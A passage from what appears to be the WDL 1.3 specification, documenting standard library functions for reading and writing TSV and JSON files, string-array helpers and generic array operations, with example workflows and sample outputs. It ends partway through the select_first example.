Writes a tab-separated value (TSV) file with one line for each element in a Map[String, String]. Each element is concatenated into a single tab-delimited string of the format ~{key}\t~{value}. Each line is terminated by the newline (\n) character. If the Map is empty, an empty file is written.
Since Maps are ordered, the order of the lines in the file is guaranteed to be the same order that the elements were added to the Map.
Parameters
Map[String, String]: AMap, where each element will be a row in the generated file.
Returns: A File.
Example: write_map_task.wdl
version 1.3
task write_map {
input {
Map[String, String] map = {"key1": "value1", "key2": "value2"}
}
command <<<
cut -f 1 ~{write_map(map)}
>>>
output {
Array[String] keys = read_lines(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
version 1.3
task write_map {
input {
Map[String, String] map = {"key1": "value1", "key2": "value2"}
}
command <<<
cut -f 1 ~{write_map(map)}
>>>
output {
Array[String] keys = read_lines(stdout())
}
requirements {
container: "ubuntu:latest"
}
}
Example input:
{}
Example output:
{
"write_map.keys": ["key1", "key2"]
}
The actual command line might look like:
cut -f 1 /local/fs/tmp/map.tsv
And /local/fs/tmp/map.tsv would contain:
key1\tvalue1
key2\tvalue2
read_json
Union read_json(File)
Reads a JSON file into a WDL value whose type depends on the file's contents. The mapping of JSON type to WDL type is:
| JSON Type | WDL Type |
|---|---|
| object | Object |
| array | Array[X] |
| number | Int or Float |
| string | String |
| boolean | Boolean |
| null | None |
The return value is of type Union and must be used in a context where it can be coerced to the expected type, or an error is raised. For example, if the JSON file contains null, then the return value will be None, meaning the value can only be used in a context where an optional type is expected.
If the JSON file contains an array, then all the elements of the array must be coercible to the same type, or an error is raised.
The read_json function does not have access to any WDL type information, so it cannot return an instance of a specific Struct type. Instead, it returns a generic Object value that must be coerced to the desired Struct type.
Note that an empty file is not valid according to the JSON specification, and so calling read_json on an empty file raises an error.
Parameters
File: Path of the JSON file to read.
Returns: A value whose type is dependent on the contents of the JSON file.
Example: read_person.wdl
version 1.3
struct Person {
String name
Int age
}
workflow read_person {
input {
File json_file
}
output {
Person p = read_json(json_file)
}
}
version 1.3
struct Person {
String name
Int age
}
workflow read_person {
input {
File json_file
}
output {
Person p = read_json(json_file)
}
}
Example input:
{
"read_person.json_file": "data/person.json"
}
Example output:
{
"read_person.p": {
"name": "John",
"age": 42
}
}
write_json
File write_json(X)
Writes a JSON file with the serialized form of a WDL value. The following WDL types can be serialized:
| WDL Type | JSON Type |
|---|---|
Struct | object |
Object | object |
Map[String, X] | object |
Array[X] | array |
Int | number |
Float | number |
String | string |
File | string |
Boolean | boolean |
None | null |
When serializing compound types, all nested types must be serializable or an error is raised.
Parameters
X: A WDL value of a supported type.
Returns: A File.
Example: write_json_fail.wdl
version 1.3
workflow write_json_fail {
Pair[Int, Map[Int, String]] x = (1, {2: "hello"})
# this fails with an error - Map with Int keys is not serializable
File f = write_json(x)
}
version 1.3
workflow write_json_fail {
Pair[Int, Map[Int, String]] x = (1, {2: "hello"})
# this fails with an error - Map with Int keys is not serializable
File f = write_json(x)
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
Example: write_json_task.wdl
version 1.3
task write_json {
input {
Map[String, String] map = {"key1": "value1", "key2": "value2"}
}
command <<<
python <<CODE
import json
import sys
with open("~{write_json(map)}") as js:
d = json.load(js)
json.dump(list(d.keys()), sys.stdout)
CODE
>>>
output {
Array[String] keys = read_json(stdout())
}
requirements {
container: "python:latest"
}
}
version 1.3
task write_json {
input {
Map[String, String] map = {"key1": "value1", "key2": "value2"}
}
command <<<
python <<CODE
import json
import sys
with open("~{write_json(map)}") as js:
d = json.load(js)
json.dump(list(d.keys()), sys.stdout)
CODE
>>>
output {
Array[String] keys = read_json(stdout())
}
requirements {
container: "python:latest"
}
}
Example input:
{}
Example output:
{
"write_json.keys": ["key1", "key2"]
}
The actual command line might look like:
python <<CODE
import json
with open("local/fs/tmp/map.json") as js:
d = json.load(js)
print(list(d.keys()))
CODE
And /local/fs/tmp/map.json would contain:
Each line is terminated by the newline (\n) character.
{
"key1": "value1",
"key2": "value2"
}
read_object
Object read_object(File)
Reads a tab-separated value (TSV) file representing the names and values of the members of an Object. There must be exactly two rows, and each row must have the same number of elements, otherwise an error is raised. Trailing end-of-line characters (\r and \n) are removed from each line.
The first row specifies the object member names. The names in the first row must be unique; if there are any duplicate names, an error is raised.
The second row specifies the object member values corresponding to the names in the first row. All of the Object's values are of type String.
Parameters
File: Path of the two-row TSV file to read.
Returns: An Object, with as many members as there are unique names in the TSV.
Example: read_object_task.wdl
version 1.3
task read_object {
command <<<
python <<CODE
print('\t'.join(["key_{}".format(i) for i in range(3)]))
print('\t'.join(["value_{}".format(i) for i in range(3)]))
CODE
>>>
output {
Object my_obj = read_object(stdout())
}
requirements {
container: "python:latest"
}
}
version 1.3
task read_object {
command <<<
python <<CODE
print('\t'.join(["key_{}".format(i) for i in range(3)]))
print('\t'.join(["value_{}".format(i) for i in range(3)]))
CODE
>>>
output {
Object my_obj = read_object(stdout())
}
requirements {
container: "python:latest"
}
}
Example input:
{}
Example output:
{
"read_object.my_obj": {
"key_0": "value_0",
"key_1": "value_1",
"key_2": "value_2"
}
}
The command outputs the following lines to stdout:
key_0\tkey_1\tkey_2
value_0\tvalue_1\tvalue_2
Which are read into an Object with the following members:
| Attribute | Value | | key_0 | "value_0" | | key_1 | "value_1" | | key_2 | "value_2" |
read_objects
Array[Object] read_objects(File)
Reads a tab-separated value (TSV) file representing the names and values of the members of any number of Objects. Trailing end-of-line characters (\r and \n) are removed from each line.
The first line of the file must be a header row with the names of the object members. The names in the first row must be unique; if there are any duplicate names, an error is raised.
There are any number of additional rows, where each additional row contains the values of an object corresponding to the member names. Each row in the file must have the same number of fields as the header row. All of the Object's values are of type String.
If the file is empty or contains only a header line, an empty array is returned.
Parameters
File: Path of the TSV file to read.
Returns: An Array[Object], with N-1 elements, where N is the number of rows in the file.
Example: read_objects_task.wdl
version 1.3
task read_objects {
command <<<
python <<CODE
print('\t'.join(["key_{}".format(i) for i in range(3)]))
print('\t'.join(["value_A{}".format(i) for i in range(3)]))
print('\t'.join(["value_B{}".format(i) for i in range(3)]))
print('\t'.join(["value_C{}".format(i) for i in range(3)]))
CODE
>>>
output {
Array[Object] my_obj = read_objects(stdout())
}
requirements {
container: "python:latest"
}
}
version 1.3
task read_objects {
command <<<
python <<CODE
print('\t'.join(["key_{}".format(i) for i in range(3)]))
print('\t'.join(["value_A{}".format(i) for i in range(3)]))
print('\t'.join(["value_B{}".format(i) for i in range(3)]))
print('\t'.join(["value_C{}".format(i) for i in range(3)]))
CODE
>>>
output {
Array[Object] my_obj = read_objects(stdout())
}
requirements {
container: "python:latest"
}
}
Example input:
{}
Example output:
{
"read_objects.my_obj": [
{
"key_0": "value_A0",
"key_1": "value_A1",
"key_2": "value_A2"
},
{
"key_0": "value_B0",
"key_1": "value_B1",
"key_2": "value_B2"
},
{
"key_0": "value_C0",
"key_1": "value_C1",
"key_2": "value_C2"
}
]
}
The command outputs the following lines to stdout:
key_0\tkey_1\tkey_3
value_A0\tvalue_A1\tvalue_A2
value_B0\tvalue_B1\tvalue_B2
value_C0\tvalue_C1\tvalue_C2
Which are read into an Array[Object] with the following elements:
| Index | Attribute | Value |
|---|---|---|
| 0 | key_0 | "value_A0" |
| key_1 | "value_A1" | |
| key_2 | "value_A2" | |
| 1 | key_0 | "value_B0" |
| key_1 | "value_B1" | |
| key_2 | "value_B2" | |
| 2 | key_0 | "value_C0" |
| key_1 | "value_C1" | |
| key_2 | "value_C2" |
write_object
File write_object(Struct|Object)
Writes a tab-separated value (TSV) file with the contents of a Object or Struct. The file contains two tab-delimited lines. The first line is the names of the members, and the second line is the corresponding values. Each line is terminated by the newline (\n) character. The ordering of the columns is unspecified.
The member values must be serializable to strings, meaning that only primitive types are supported. Attempting to write a Struct or Object that has a compound member value results in an error.
Parameters
Struct|Object: An object to write.
Returns: A File.
Example: write_object_task.wdl
version 1.3
task write_object {
input {
Object obj
}
command <<<
cut -f 1 ~{write_object(obj)}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
version 1.3
task write_object {
input {
Object obj
}
command <<<
cut -f 1 ~{write_object(obj)}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
Example input:
{
"write_object.obj": {
"key_1": "value_1",
"key_2": "value_2",
"key_3": "value_3"
}
}
Example output:
{
"write_object.results": ["key_1", "value_1"]
}
The actual command line might look like:
cut -f 1 /path/to/input.tsv
If obj has the following members:
| Attribute | Value |
|---|---|
| key_1 | "value_1" |
| key_2 | "value_2" |
| key_3 | "value_3" |
Then /path/to/input.tsv will contain:
key_1\tkey_2\tkey_3
value_1\tvalue_2\tvalue_3
write_objects
File write_objects(Array[Struct|Object])
Writes a tab-separated value (TSV) file with the contents of a Array[Struct] or Array[Object]. All elements of the Array must have the same member names, or an error is raised.
The file contains N+1 tab-delimited lines, where N is the number of elements in the Array. The first line is the names of the Struct/Object members, and the subsequent lines are the corresponding values for each element. Each line is terminated by a newline (\n) character. The lines are written in the same order as the elements in the Array. The ordering of the columns is the same as the order in which the Struct's members are defined; the column ordering for Objects is unspecified. If the Array is empty, an empty file is written.
The member values must be serializable to strings, meaning that only primitive types are supported. Attempting to write a Struct or Object that has a compound member value results in an error.
Parameters
Array[Struct|Object]: An array of objects to write.
Returns: A File.
Example: write_objects_task.wdl
version 1.3
task write_objects {
input {
Array[Object] obj_array
}
command <<<
cut -f 1 ~{write_objects(obj_array)}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
version 1.3
task write_objects {
input {
Array[Object] obj_array
}
command <<<
cut -f 1 ~{write_objects(obj_array)}
>>>
output {
Array[String] results = read_lines(stdout())
}
}
Example input:
{
"write_objects.obj_array": [
{
"key_1": "value_1",
"key_2": "value_2",
"key_3": "value_3"
},
{
"key_1": "value_4",
"key_2": "value_5",
"key_3": "value_6"
},
{
"key_1": "value_7",
"key_2": "value_8",
"key_3": "value_9"
}
]
}
Example output:
{
"write_objects.results": ["key_1", "value_1", "value_4", "value_7"]
}
The actual command line might look like:
cut -f 1 /path/to/input.tsv
If obj_array has the items:
| Index | Attribute | Value |
|---|---|---|
| 0 | key_1 | "value_1" |
| key_2 | "value_2" | |
| key_3 | "value_3" | |
| 1 | key_1 | "value_4" |
| key_2 | "value_5" | |
| key_3 | "value_6" | |
| 2 | key_1 | "value_7" |
| key_2 | "value_8" | |
| key_3 | "value_9" |
The /path/to/input.tsv will contain:
key_1\tkey_2\tkey_3
value_1\tvalue_2\tvalue_3
value_4\tvalue_5\tvalue_6
value_7\tvalue_8\tvalue_9
String Array Functions
These functions take an Array as input and return a String or Array[String]. Due to type coercion, the Array argument may be of any primitive type (denoted by P).
Restrictions: None
prefix
Array[String] prefix(String, Array[P])
Adds a prefix to each element of the input array of primitive values. Equivalent to evaluating "~{prefix}~{array[i]}" for each i in range(length(array)).
Parameters
String: The prefix to prepend to each element in the array.Array[P]: Array with a primitive element type.
Returns: An Array[String] with the prefixed elements of the input array.
Example: test_prefix.wdl
version 1.3
workflow test_prefix {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_prefixed = prefix("-e ", env1)
Array[String] env2_prefixed = prefix("-f ", env2)
}
}
version 1.3
workflow test_prefix {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_prefixed = prefix("-e ", env1)
Array[String] env2_prefixed = prefix("-f ", env2)
}
}
Example input:
{}
Example output:
{
"test_prefix.env1_prefixed": ["-e key1=value1", "-e key2=value2", "-e key3=value3"],
"test_prefix.env2_prefixed": ["-f 1", "-f 2", "-f 3"]
}
Example: test_prefix_fail.wdl
version 1.3
workflow test_prefix_fail {
Array[Array[String]] env3 = [["a", "b], ["c", "d"]]
# this fails with an error - env3 element type is not primitive
Array[String] bad = prefix("-x ", env3)
}
version 1.3
workflow test_prefix_fail {
Array[Array[String]] env3 = [["a", "b], ["c", "d"]]
# this fails with an error - env3 element type is not primitive
Array[String] bad = prefix("-x ", env3)
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
suffix
Array[String] suffix(String, Array[P])
Adds a suffix to each element of the input array of primitive values. Equivalent to evaluating "~{array[i]}~{suffix}" for each i in range(length(array)).
Parameters
String: The suffix to append to each element in the array.Array[P]: Array with a primitive element type.
Returns: An Array[String] the suffixed elements of the input array.
Example: test_suffix.wdl
version 1.3
workflow test_suffix {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_suffix = suffix(".txt", env1)
Array[String] env2_suffix = suffix(".0", env2)
}
}
version 1.3
workflow test_suffix {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_suffix = suffix(".txt", env1)
Array[String] env2_suffix = suffix(".0", env2)
}
}
Example input:
{}
Example output:
{
"test_suffix.env1_suffix": ["key1=value1.txt", "key2=value2.txt", "key3=value3.txt"],
"test_suffix.env2_suffix": ["1.0", "2.0", "3.0"]
}
Example: test_suffix_fail.wdl
version 1.3
workflow test_suffix_fail {
Array[Array[String]] env3 = [["a", "b], ["c", "d"]]
# this fails with an error - env3 element type is not primitive
Array[String] bad = suffix("-z", env3)
}
version 1.3
workflow test_suffix_fail {
Array[Array[String]] env3 = [["a", "b], ["c", "d"]]
# this fails with an error - env3 element type is not primitive
Array[String] bad = suffix("-z", env3)
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
quote
Array[String] quote(Array[P])
Adds double-quotes (") around each element of the input array of primitive values. Equivalent to evaluating '"~{array[i]}"' for each i in range(length(array)).
Parameters
Array[P]: Array with a primitive element type.
Returns: An Array[String] the double-quoted elements of the input array.
Example: test_quote.wdl
version 1.3
workflow test_quote {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_quoted = quote(env1)
Array[String] env2_quoted = quote(env2)
}
}
version 1.3
workflow test_quote {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_quoted = quote(env1)
Array[String] env2_quoted = quote(env2)
}
}
Example input:
{}
Example output:
{
"test_quote.env1_quoted": ["\"key1=value1\"", "\"key2=value2\"", "\"key3=value3\""],
"test_quote.env2_quoted": ["\"1\"", "\"2\"", "\"3\""]
}
squote
Array[String] squote(Array[P])
Adds single-quotes (') around each element of the input array of primitive values. Equivalent to evaluating "'~{array[i]}'" for each i in range(length(array)).
Parameters
Array[P]: Array with a primitive element type.
Returns: An Array[String] the single-quoted elements of the input array.
Example: test_squote.wdl
version 1.3
workflow test_squote {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_quoted = squote(env1)
Array[String] env2_quoted = squote(env2)
}
}
version 1.3
workflow test_squote {
Array[String] env1 = ["key1=value1", "key2=value2", "key3=value3"]
Array[Int] env2 = [1, 2, 3]
output {
Array[String] env1_quoted = squote(env1)
Array[String] env2_quoted = squote(env2)
}
}
Example input:
{}
Example output:
{
"test_squote.env1_quoted": ["'key1=value1'", "'key2=value2'", "'key3=value3'"],
"test_squote.env2_quoted": ["'1'", "'2'", "'3'"]
}
sep
String sep(String, Array[P])
Concatenates the elements of an array together into a string with the given separator between consecutive elements. There are always N-1 separators in the output string, where N is the length of the input array. A separator is never added after the last element. Returns an empty string if the array is empty.
Parameters
String: Separator string.Array[P]: Array of strings to concatenate.
Returns: A String with the concatenated elements of the array delimited by the separator string.
Example: test_sep.wdl
version 1.3
workflow test_sep {
Array[String] a = ["file_1", "file_2"]
output {
# these all evaluate to true
Array[Boolean] all_true = [
sep(' ', prefix('-i ', a)) == "-i file_1 -i file_2",
sep("", ["a", "b", "c"]) == "abc",
sep(' ', ["a", "b", "c"]) == "a b c",
sep(',', [1]) == "1"
]
}
}
version 1.3
workflow test_sep {
Array[String] a = ["file_1", "file_2"]
output {
# these all evaluate to true
Array[Boolean] all_true = [
sep(' ', prefix('-i ', a)) == "-i file_1 -i file_2",
sep("", ["a", "b", "c"]) == "abc",
sep(' ', ["a", "b", "c"]) == "a b c",
sep(',', [1]) == "1"
]
}
}
Example input:
{}
Example output:
{
"test_sep.all_true": [true, true, true, true]
}
Generic Array Functions
These functions are generic and take an Array as input and/or return an Array.
Restrictions: None
range
Array[Int] range(Int)
Creates an array of the given length containing sequential integers starting from 0. The length must be >= 0. If the length is 0, an empty array is returned.
Parameters
Int: The length of array to create.
Returns: An Array[Int] containing integers 0..(N-1).
Example: test_range.wdl
version 1.3
task double {
input {
Int n
}
command <<< >>>
output {
Int d = 2 * n
}
}
workflow test_range {
input {
Int i
}
Array[Int] indexes = range(i)
scatter (idx in indexes) {
call double { n = idx }
}
output {
Array[Int] result = double.d
}
}
version 1.3
task double {
input {
Int n
}
command <<< >>>
output {
Int d = 2 * n
}
}
workflow test_range {
input {
Int i
}
Array[Int] indexes = range(i)
scatter (idx in indexes) {
call double { n = idx }
}
output {
Array[Int] result = double.d
}
}
Example input:
{
"test_range.i": 5
}
Example output:
{
"test_range.result": [0, 2, 4, 6, 8]
}
transpose
Array[Array[X]] transpose(Array[Array[X]])
Transposes a two-dimensional array according to the standard matrix transposition rules, i.e. each row of the input array becomes a column of the output array. The input array must be square - i.e., every row must have the same number of elements - or an error is raised. If either the inner or the outer array is empty, an empty array is returned.
Parameters
Array[Array[X]]: AM*Ntwo-dimensional array.
Returns: A N*M two-dimensional array (Array[Array[X]]) containing the transposed input array.
Example: test_transpose.wdl
version 1.3
workflow test_transpose {
# input array is 2 rows * 3 columns
Array[Array[Int]] input_array = [[0, 1, 2], [3, 4, 5]]
# output array is 3 rows * 2 columns
Array[Array[Int]] expected_output_array = [[0, 3], [1, 4], [2, 5]]
output {
Array[Array[Int]] out = transpose(input_array)
Array[Array[Int]] expected = expected_output_array
Boolean is_true = out == expected
}
}
version 1.3
workflow test_transpose {
# input array is 2 rows * 3 columns
Array[Array[Int]] input_array = [[0, 1, 2], [3, 4, 5]]
# output array is 3 rows * 2 columns
Array[Array[Int]] expected_output_array = [[0, 3], [1, 4], [2, 5]]
output {
Array[Array[Int]] out = transpose(input_array)
Array[Array[Int]] expected = expected_output_array
Boolean is_true = out == expected
}
}
Example input:
{}
Example output:
{
"test_transpose.out": [[0, 3], [1, 4], [2, 5]],
"test_transpose.expected": [[0, 3], [1, 4], [2, 5]],
"test_transpose.is_true": true
}
cross
Array[Pair[X,Y]] cross(Array[X], Array[Y])
Creates an array of Pairs containing the cross product of two input arrays, i.e., each element in the first array is paired with each element in the second array.
Given Array[X] of length M, and Array[Y] of length N, the cross product is Array[Pair[X, Y]] of length M*N with the following elements: [(X0, Y0), (X0, Y1), ..., (X0, Yn-1), (X1, Y0), ..., (X1, Yn-1), ..., (Xm-1, Yn-1)]. If either of the input arrays is empty, an empty array is returned.
Parameters
Array[X]: The first array of lengthM.Array[Y]: The second array of lengthN.
Returns: An Array[Pair[X, Y]] of length M*N.
Example: test_cross.wdl
version 1.3
workflow test_cross {
Array[Int] xs = [1, 2, 3]
Array[String] ys = ["a", "b"]
Array[Pair[Int, String]] expected = [
(1, "a"), (1, "b"), (2, "a"), (2, "b"), (3, "a"), (3, "b")
]
output {
Boolean is_true = cross(xs, ys) == expected
}
}
version 1.3
workflow test_cross {
Array[Int] xs = [1, 2, 3]
Array[String] ys = ["a", "b"]
Array[Pair[Int, String]] expected = [
(1, "a"), (1, "b"), (2, "a"), (2, "b"), (3, "a"), (3, "b")
]
output {
Boolean is_true = cross(xs, ys) == expected
}
}
Example input:
{}
Example output:
{
"test_cross.is_true": true
}
zip
Array[Pair[X,Y]] zip(Array[X], Array[Y])
Creates an array of Pairs containing the dot product of two input arrays, i.e., the elements at the same indices in each array X[i] and Y[i] are combined together into (X[i], Y[i]) for each i in range(length(X)). The input arrays must have the same lengths or an error is raised. If the input arrays are empty, an empty array is returned.
Parameters
Array[X]: The first array of lengthN.Array[Y]: The second array of lengthN.
Returns: An Array[Pair[X, Y]] of length N.
Example: test_zip.wdl
version 1.3
workflow test_zip {
Array[Int] xs = [1, 2, 3]
Array[String] ys = ["a", "b", "c"]
Array[Pair[Int, String]] expected = [(1, "a"), (2, "b"), (3, "c")]
output {
Boolean is_true = zip(xs, ys) == expected
}
}
version 1.3
workflow test_zip {
Array[Int] xs = [1, 2, 3]
Array[String] ys = ["a", "b", "c"]
Array[Pair[Int, String]] expected = [(1, "a"), (2, "b"), (3, "c")]
output {
Boolean is_true = zip(xs, ys) == expected
}
}
Example input:
{}
Example output:
{
"test_zip.is_true": true
}
Example: test_zip_fail.wdl
version 1.3
workflow test_zip_fail {
Array[Int] xs = [1, 2, 3]
Array[String] zs = ["d", "e"]
# this fails with an error - xs and zs are not the same length
Array[Pair[Int, String]] bad = zip(xs, zs)
}
version 1.3
workflow test_zip_fail {
Array[Int] xs = [1, 2, 3]
Array[String] zs = ["d", "e"]
# this fails with an error - xs and zs are not the same length
Array[Pair[Int, String]] bad = zip(xs, zs)
}
Example input:
{}
Example output:
{}
Test config:
{
"fail": true
}
unzip
Pair[Array[X], Array[Y]] unzip(Array[Pair[X, Y]])
Creates a Pair of Arrays, the first containing the elements from the left members of an Array of Pairs, and the second containing the right members. If the array is empty, a pair of empty arrays is returned. This is the inverse of the zip function.
Parameters
Array[Pair[X, Y]]: TheArrayofPairs of lengthNto unzip.
Returns: A Pair[Array[X], Array[Y]] where each Array is of length N.
Example: test_unzip.wdl
version 1.3
workflow test_unzip {
Array[Pair[Int, String]] int_str_arr = [(0, "hello"), (42, "goodbye")]
Map[String, Int] m = {"a": 0, "b": 1, "c": 2}
Pair[Array[String], Array[Int]] keys_and_values = unzip(as_pairs(m))
Pair[Array[Int], Array[String]] expected1 = ([0, 42], ["hello", "goodbye"])
Array[String] expected_keys = ["a", "b", "c"]
Array[Int] expected_values = [0, 1, 2]
output {
Boolean is_true1 = unzip(int_str_arr) == expected1
Boolean is_true2 = keys_and_values.left == expected_keys
Boolean is_true3 = keys_and_values.right == expected_values
}
}
version 1.3
workflow test_unzip {
Array[Pair[Int, String]] int_str_arr = [(0, "hello"), (42, "goodbye")]
Map[String, Int] m = {"a": 0, "b": 1, "c": 2}
Pair[Array[String], Array[Int]] keys_and_values = unzip(as_pairs(m))
Pair[Array[Int], Array[String]] expected1 = ([0, 42], ["hello", "goodbye"])
Array[String] expected_keys = ["a", "b", "c"]
Array[Int] expected_values = [0, 1, 2]
output {
Boolean is_true1 = unzip(int_str_arr) == expected1
Boolean is_true2 = keys_and_values.left == expected_keys
Boolean is_true3 = keys_and_values.right == expected_values
}
}
Example input:
{}
Example output:
{
"test_unzip.is_true1": true,
"test_unzip.is_true2": true,
"test_unzip.is_true3": true
}
contains
as of version 1.2
Boolean contains(Array[P], P)
Boolean contains(Array[P?], P?)
Tests whether the given array contains at least one occurrence of the given value.
Parameters
Array[P]orArray[P?]: an array of any primitive type.PorP?: a primitive value of the same type as the array. If the array's type is optional, then the value may also be optional.
Returns: true if the array contains at least one occurrence of the value, otherwise false.
Example
Example: test_contains.wdl
version 1.3
task null_sample {
command <<<
echo "Sample array contains a null value!"
>>>
}
task missing_sample {
input {
String name
}
command <<<
echo "Sample ~{name} is missing!"
>>>
}
workflow test_contains {
input {
Array[String?] samples
String name
}
Boolean has_null = contains(samples, None)
if (has_null) {
call null_sample
}
Boolean has_missing = !contains(samples, name)
if (has_missing) {
call missing_sample { input: name }
}
output {
Boolean samples_are_valid = !(has_null || has_missing)
}
}
version 1.3
task null_sample {
command <<<
echo "Sample array contains a null value!"
>>>
}
task missing_sample {
input {
String name
}
command <<<
echo "Sample ~{name} is missing!"
>>>
}
workflow test_contains {
input {
Array[String?] samples
String name
}
Boolean has_null = contains(samples, None)
if (has_null) {
call null_sample
}
Boolean has_missing = !contains(samples, name)
if (has_missing) {
call missing_sample { input: name }
}
output {
Boolean samples_are_valid = !(has_null || has_missing)
}
}
Example input:
{
"test_contains.samples": [null, "foo"],
"test_contains.name": "bar"
}
Example output:
{
"test_contains.samples_are_valid": false
}
chunk
as of version 1.2
Array[Array[X]] chunk(Array[X], Int)
Given an array and a length n, splits the array into consecutive, non-overlapping arrays of n elements. If the length of the array is not a multiple n then the final sub-array will have length(array) % n elements.
Parameters
Array[X]: The array to split. May be empty.Int: The desired length of the sub-arrays. Must be > 0.
Returns: An array of sub-arrays, where each sub-array is of length N except possibly the last one.
Example: chunk_array.wdl
version 1.3
workflow chunk_array {
Array[String] s1 = ["a", "b", "c", "d", "e", "f"]
Array[String] s2 = ["a", "b", "c", "d", "e"]
Array[String] s3 = ["a", "b"]
Array[String] s4 = []
scatter (a in chunk(s1, 3)) {
String concat = sep("", a)
}
output {
Boolean is_reversible = s1 == flatten(chunk(s1, 3))
Array[Array[String]] o1 = chunk(s1, 3)
Array[Array[String]] o2 = chunk(s2, 3)
Array[Array[String]] o3 = chunk(s3, 3)
Array[Array[String]] o4 = chunk(s4, 3)
Array[String] concats = concat
}
}
version 1.3
workflow chunk_array {
Array[String] s1 = ["a", "b", "c", "d", "e", "f"]
Array[String] s2 = ["a", "b", "c", "d", "e"]
Array[String] s3 = ["a", "b"]
Array[String] s4 = []
scatter (a in chunk(s1, 3)) {
String concat = sep("", a)
}
output {
Boolean is_reversible = s1 == flatten(chunk(s1, 3))
Array[Array[String]] o1 = chunk(s1, 3)
Array[Array[String]] o2 = chunk(s2, 3)
Array[Array[String]] o3 = chunk(s3, 3)
Array[Array[String]] o4 = chunk(s4, 3)
Array[String] concats = concat
}
}
Example input:
{}
Example output:
{
"chunk_array.is_reversible": true,
"chunk_array.o1": [["a", "b", "c"], ["d", "e", "f"]],
"chunk_array.o2": [["a", "b", "c"], ["d", "e"]],
"chunk_array.o3": [["a", "b"]],
"chunk_array.o4": [],
"chunk_array.concats": ["abc", "def"]
}
flatten
Array[X] flatten(Array[Array[X]])
Flattens a nested Array[Array[X]] by concatenating all of the element arrays, in order, into a single array. The function is not recursive - e.g. if the input is Array[Array[Array[Int]]] then the output will be Array[Array[Int]]. The elements in the concatenated array are not deduplicated.
Parameters
Array[Array[X]]: A nested array to flatten.
Returns: An Array[X] containing the concatenated elements of the input array.
Example: test_flatten.wdl
version 1.3
workflow test_flatten {
input {
Array[Array[Int]] ai2D = [[1, 2, 3], [1], [21, 22]]
Array[Array[File]] af2D = [["data/cities.txt"], ["data/wizard.txt", "data/spell.txt"], []]
Array[Array[Pair[Float, String]]] aap2D = [[(0.1, "mouse")], [(3, "cat"), (15, "dog")]]
Map[Float, String] f2s = as_map(flatten(aap2D))
Array[Array[Array[Int]]] ai3D = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]
Array[Int] expected1D = [1, 2, 3, 1, 21, 22]
Array[File] expected2D = ["data/cities.txt", "data/wizard.txt", "data/spell.txt"]
Array[Array[Int]] expected3D = [[1, 2], [3, 4], [5, 6], [7, 8]]
Array[Pair[Float, String]] expectedArray = [(0.1, "mouse"), (3.0, "cat"), (15.0, "dog")]
Map[Float, String] expectedMap = {0.1: "mouse", 3.0: "cat", 15.0: "dog"}
}
output {
Boolean is_true1 = flatten(ai2D) == expected1D
Boolean is_true2 = flatten(af2D) == expected2D
Boolean is_true3 = flatten(aap2D) == expectedArray
Boolean is_true4 = flatten(ai3D) == expected3D
Boolean is_true5 = f2s == expectedMap
}
}
version 1.3
workflow test_flatten {
input {
Array[Array[Int]] ai2D = [[1, 2, 3], [1], [21, 22]]
Array[Array[File]] af2D = [["data/cities.txt"], ["data/wizard.txt", "data/spell.txt"], []]
Array[Array[Pair[Float, String]]] aap2D = [[(0.1, "mouse")], [(3, "cat"), (15, "dog")]]
Map[Float, String] f2s = as_map(flatten(aap2D))
Array[Array[Array[Int]]] ai3D = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]
Array[Int] expected1D = [1, 2, 3, 1, 21, 22]
Array[File] expected2D = ["data/cities.txt", "data/wizard.txt", "data/spell.txt"]
Array[Array[Int]] expected3D = [[1, 2], [3, 4], [5, 6], [7, 8]]
Array[Pair[Float, String]] expectedArray = [(0.1, "mouse"), (3.0, "cat"), (15.0, "dog")]
Map[Float, String] expectedMap = {0.1: "mouse", 3.0: "cat", 15.0: "dog"}
}
output {
Boolean is_true1 = flatten(ai2D) == expected1D
Boolean is_true2 = flatten(af2D) == expected2D
Boolean is_true3 = flatten(aap2D) == expectedArray
Boolean is_true4 = flatten(ai3D) == expected3D
Boolean is_true5 = f2s == expectedMap
}
}
Example input:
{}
Example output:
{
"test_flatten.is_true1": true,
"test_flatten.is_true2": true,
"test_flatten.is_true3": true,
"test_flatten.is_true4": true,
"test_flatten.is_true5": true
}
select_first
X select_first(Array[X?]+)
X select_first(Array[X?], X)
Selects the first - i.e., left-most - non-None value from an Array of optional values. The optional second parameter provides a default value that is returned if the array is empty or contains only None values. If the default value is not provided and the array is empty or contains only None values, then an error is raised.
Parameters
Array[X?]+: Non-emptyArrayof optional values.X: (Optional) The default value.
Returns: The first non-None value in the input array, or the default value if it is provided and the array does not contain any non-None values.
Example: test_select_first.wdl
version 1.3
workflow test_select_first {
input {
Int? maybe_five = 5
Int? maybe_four_but_is_not = None
Int? maybe_three = 3
}
output {
# all of these statements evaluate to 5
Int fiveA = select_first([maybe_five, maybe_four_but_is_not, maybe_three])
Int fiveB = select_first([maybe_four_but_is_not, maybe_five, maybe_three])
Int fiveC = select_first([], 5)
Int fiveD = select_first([None], 5)
}
}
version 1.3
workflow test_select_first {
input {
Int? maybe_five = 5
Int? maybe_four_but_is_not = None
Int? maybe_three = 3
}
output {
# all of these statements evaluate to 5
Int fiveA = select_first([maybe_five, maybe_four_but_is_not, maybe_three])
